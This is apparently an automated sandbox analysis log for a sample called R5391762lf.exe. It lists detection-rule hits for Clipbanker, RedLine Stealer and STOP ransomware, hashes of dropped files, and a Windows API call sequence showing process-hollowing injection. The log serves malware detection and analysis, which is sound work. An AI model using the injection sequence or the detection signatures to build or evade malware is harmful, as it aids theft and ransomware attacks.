Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.1405143882.0000000004456000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000002.1620821652.000000000088C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1373934785.0000000004498000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.1502845330.0000000001D0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.1548118097.0000000004466000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.1411013560.0000000004578000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001B.00000002.2060772952.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000017.00000002.1792336779.00000000044D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.1703479175.0000000000B3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.3283516956.0000000000AC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001E.00000002.2677244146.0000000000880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_05EA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_05EA0110
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 5_2_05DB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 5_2_05DB0110
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: 6_2_05EC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 6_2_05EC0110
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: String function: 05EF0160 appears 50 times
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Code function: String function: 05EE8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 00428C81 appears 42 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 05EC8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 05ED0160 appears 50 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 004547A0 appears 75 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 05DE0160 appears 50 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 05DD8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 0042F7C0 appears 99 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 00428520 appears 77 times
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: String function: 00454E50 appears 42 times
Source: R5391762lf.exe, 00000000.00000002.1373459929.00000000040A1000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000002.00000003.1391294965.0000000002F71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000002.00000000.1370901949.00000000040A1000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000005.00000002.1404961018.00000000040A1000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000006.00000002.1410752976.00000000040A1000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000007.00000000.1401160691.00000000040A1000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
